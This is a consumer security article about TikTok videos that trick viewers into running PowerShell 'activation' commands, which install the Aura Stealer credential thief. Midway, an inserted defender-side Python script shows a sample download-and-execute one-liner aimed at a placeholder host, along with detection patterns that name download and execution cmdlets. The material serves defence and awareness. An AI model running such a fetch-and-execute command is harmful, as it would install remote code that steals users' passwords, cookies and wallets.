Malware scam on TikTok tricks users with fake software activation instructions to collect personal information.

Cybercriminals are using TikTok again to ensnare unsuspecting users. This time, they’re promoting malware disguised as free activation guides for various software, including Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens uncovered this scheme, noting that similar tactics have been observed before. According to reports, these deceptive TikTok videos showcase brief PowerShell commands, luring unsuspecting viewers into running them as administrators to “activate” or “fix” programs.

However, what these commands really do is link to a malicious site that downloads malware called Aura Stealer. This malware quietly collects saved passwords, cookies, cryptocurrency wallet information, and authentication tokens from the victim’s system.

Understanding TikTok Scams

Experts categorize this scheme as a ClickFix attack—a social engineering tactic designed to mislead victims into thinking they’re simply following legitimate tech guidance. The steps seem quick and easy, promising instant access to premium software with just one short command.

In truth, that PowerShell command leads to a remote domain that downloads harmful files through Cloudflare. The primary file involved, updater.exe, is a variant of Aura Stealer. Once it infiltrates a system, it seeks out credentials and sends them back to the perpetrator.

Another file, source.exe, employs Microsoft’s C# compiler to execute code directly in memory, complicating detection. The specific role of this second payload isn’t entirely clear, but it follows a pattern seen in previous malware aimed at stealing cryptocurrency or delivering ransomware.
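A defender-side triage sketch for the two behaviours described above, added here as an example (it is not from the original article or from Mertens' analysis). It flags a PowerShell one-liner that both downloads and executes remote content, and a csc.exe process started by a parent that is not a build tool; the sample events, the example.invalid URL, the parent allowlist and the assumption that the runtime compile shows up as a csc.exe child process are all constructed for illustration.

```python
import re

# Constructed process-creation records (parent, image, command line).
# Assumption: fields resemble Sysmon Event ID 1 / Security 4688 data.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell.exe -Command "iex (irm https://activate.example.invalid/win)"'),
    ("explorer.exe", "powershell.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ("source.exe", "csc.exe",
     r"csc.exe /noconfig @C:\Users\u\AppData\Local\Temp\a1b2.cmdline"),
    ("msbuild.exe", "csc.exe", "csc.exe /noconfig /out:app.dll Program.cs"),
]

# Cmdlets, aliases and methods that fetch remote content.
DOWNLOAD = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|"
    r"downloadfile|curl|wget)\b", re.I)
# Cmdlets and aliases that run a string as code.
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s\"')]+", re.I)
# Hypothetical allowlist of parents expected to launch the C# compiler.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}


def classify(parent, image, cmdline):
    """Return the reasons an event looks suspicious (empty list = no finding)."""
    reasons = []
    parent, image = parent.lower(), image.lower()
    if image in ("powershell.exe", "pwsh.exe"):
        # ClickFix-style commands fetch a script and run it in one short line.
        if DOWNLOAD.search(cmdline) and EXECUTE.search(cmdline):
            url = URL.search(cmdline)
            target = f" fetching {url.group(0)}" if url else ""
            reasons.append("download-and-execute one-liner" + target)
    if image == "csc.exe" and parent not in BUILD_PARENTS:
        reasons.append(f"C# compiler launched by non-build parent {parent}")
    return reasons


def triage(events):
    """Return (event, reasons) pairs for every event with at least one finding."""
    return [(e, r) for e in events if (r := classify(*e))]


if __name__ == "__main__":
    for event, reasons in triage(SAMPLE_EVENTS):
        print(event[1], "<-", event[0], "|", "; ".join(reasons))
```

Command-line matching is easy to evade with obfuscation, so treat a hit as a triage lead and pair it with PowerShell script block logging.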

Protecting Yourself from TikTok Malware

Even though these scams can be convincing, there are ways to safeguard yourself.

1) Avoid Shortcuts

Steer clear of copying or executing PowerShell commands from random TikTok videos or websites. If it offers free access to premium software, it’s likely a trap.

2) Use Trusted Sources

Always download software directly from official websites or recognized app stores.

3) Keep Security Tools Updated

Using outdated antivirus software or browsers can leave you vulnerable. Regularly update your software to stay protected.

4) Invest in Strong Antivirus Software

Choose robust antivirus tools that provide real-time scanning and protection against threats like Trojans and phishing attempts. The right software can be crucial for guarding your personal information.

5) Consider a Data Deletion Service

If your information leaks onto the dark web, a monitoring service can notify you and help remove sensitive data. While no service guarantees full data removal, they are worth considering for peace of mind, as they actively track personal information and work to erase it from multiple sites.

6) Reset Your Credentials

If you’ve followed suspicious instructions or provided credentials as a result of watching a sketchy video, reset all your passwords immediately.

7) Use Unique Passwords

It’s vital to have distinct passwords for each site. A password manager can help you create and store complex passwords, minimizing the risk of reuse.

8) Enable Multi-Factor Authentication

If offered, activate multi-factor authentication to bolster security. Even if a password is compromised, an attacker won’t gain access without further verification.

Key Takeaways

TikTok’s extensive reach makes it an attractive target for scams. What may appear to be a helpful tip can compromise your security and finances. Always be cautious, trust only verified sources, and remember—there are no shortcuts to free activation.
